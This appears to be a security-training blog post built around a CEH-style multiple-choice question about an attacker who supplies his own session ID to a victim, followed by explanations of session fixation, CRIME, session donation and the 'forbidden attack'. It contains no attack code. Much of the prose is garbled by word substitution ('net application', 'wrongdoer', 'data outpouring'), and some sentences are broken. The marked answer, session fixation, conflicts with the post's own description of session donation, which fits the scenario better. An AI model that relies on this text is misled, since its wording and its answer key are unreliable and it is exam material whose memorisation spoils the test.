session ID

Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID links the target employee to Boney’s account page without disclosing any information to the victim. When the target employee click on the link, all the sensitive payment details entered in a form are linked to Boney’s account. What is the attack performed by Boney in the above scenario?

Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID link the target employee to Boney ‘s account page without disclosing any information to the victim. When the target employee click on the link, all the sensitive payment details entered in a form are linked to Boney ‘s account. What is the attack performed by Boney in the above scenario?

Option 1 : Session fixation attack
Option 2 : CRIME attack
Option 3: Session donation attack
Option 4 : Forbidden attack

1. Session fixation attack

Session Fixation is an attack that allows an attacker to hijack a sound user session. The attack explores a limitation within the means the net application manages the session ID, a lot of specifically the vulnerable web application. once authenticating a user, it doesn’t assign a new session ID, creating it possible to use an existent session ID. The attack consists of getting a valid session ID (e.g. by connecting to the application), inducing a user to authenticate himself with that session ID, then hijacking the user-validated session by the data of the used session ID. The attacker has got to give a legitimate internet application session ID and try to make the victim’s browser use it.

The session fixation attack may be a class of Session Hijacking, that steals the established session between the client and the internet Server when the user logs in. Instead, the Session Fixation attack fixes an established session on the victim’s browser, therefore the attack starts before the user logs in.

There are many techniques to execute the attack; it depends on however the net application deals with session tokens. Below are some of the most common techniques:

  • Session token within the url argument: The Session ID is sent to the victim during a link and the victim accesses the location through the malicious url.
  • Session token during a hidden type field: during this in this, the victim must be tricked to authenticate within the target internet Server, employing a login type developed for the attacker. the form might be hosted within the evil web server or directly in html formatted e-mail.
  • Session ID in a cookie:
Client-side script

Most browsers support the execution of client-side scripting. in this case, the aggressor may use attacks of code injection because the XSS (Cross-site scripting) attack to insert a malicious code in the link sent to the victim and fix a Session ID in its cookie. using the perform document.cookie, the browser that executes the command becomes capable of fixing values within the cookie that it’ll use to stay a session between the client and the web Application.

2. CRIME attack

CRIME (Compression ratio Info-leak created Easy) may be a security exploit against secret net cookies over connections using the HTTPS and SPDY protocols that also use knowledge compression. once used to recover the content of secret authentication cookies, it allows an wrongdoer to perform session hijacking on an authenticated net session, allowing the launching of additional attacks. CRIME was allotted CVE-2012-4929.

The vulnerability exploited may be a combination of chosen plaintext attack and inadvertent data outpouring through knowledge compression kind of like that described in 2002 by the cryptographer John Kelsey. It depends on the attacker having the ability to watch the size of the ciphertext sent by the browser whereas at the same time inducing the browser to create multiple carefully crafted net connections to the target web site. The attacker then observes the change in size of the compressed request payload, that contains each the key cookie that’s sent by the browser only to the target web site, and variable content created by the attacker, because the variable content is altered. When the size of the compressed content is reduced, it can be inferred that it is probable that some part of the injected content matches some part of the supply, which has the key content that the attacker wishes to get. Divide and conquer techniques will then be accustomed aim on truth secret content in a relatively tiny range of probe tries that’s a small multiple of the number of secret bytes to be recovered.

3. Session donation attack

Session Donation Involves Social Engineering(SE) to form it possible. an attacker creates an account and send authenticated link to the victim. Convincing the victim to produce additional data about their account however truly it’s not their account however attackers acccount. Users are used to be logged in different sites exactly it less suspicious once the user click link that they already authenticated.

  • Precisely what it seems like.
  • Donating your SID to someone else.
  • Very equally to Session Fixation
  • You wish to “fix” the victim’s session to a particular ID
  • Several Session Fixation countermeasures won’t work
  • Only accepting server generated ID’s from a cookie
  • Regenerating sids
  • It’s much easier to present someone your identity instead of stealing theirs
4. Forbidden attack

Dozens of HTTPS-protected websites belonging to financial services large Visa are of visitors attacks that enable hackers to inject malicious code and forged content into the browsers of visitors, a world team of researchers has found.

In all, 184 servers—some belonging to German stock exchange Deutsche Börse and Polish banking association Zwizek Banków Polskich—were also found to be vulnerable to a decade-old exploit technique cryptographers have dubbed the “forbidden attack.” a further 70,000 webservers were found to be in danger, though the work needed to with success do the attack may prove to be prohibitively difficult. the information came from an Internet-wide scan performed in Jan. Since then, Deutsche Börse has remedied the problem, but, as of wednesday, each Visa and Zwizek Banków Polskich have allowed the vulnerability to remain and have yet to reply to any of the researchers’ private disclosures.

Learn CEH & Think like hacker


This Blog Article is posted by

Infosavvy, 2nd Floor, Sai Niketan, Chandavalkar Road Opp. Gora Gandhi Hotel, Above Jumbo King, beside Speakwell Institute, Borivali West, Mumbai, Maharashtra 400092

Contact us – www.info-savvy.com

https://g.co/kgs/ttqPpZ

Leave a Comment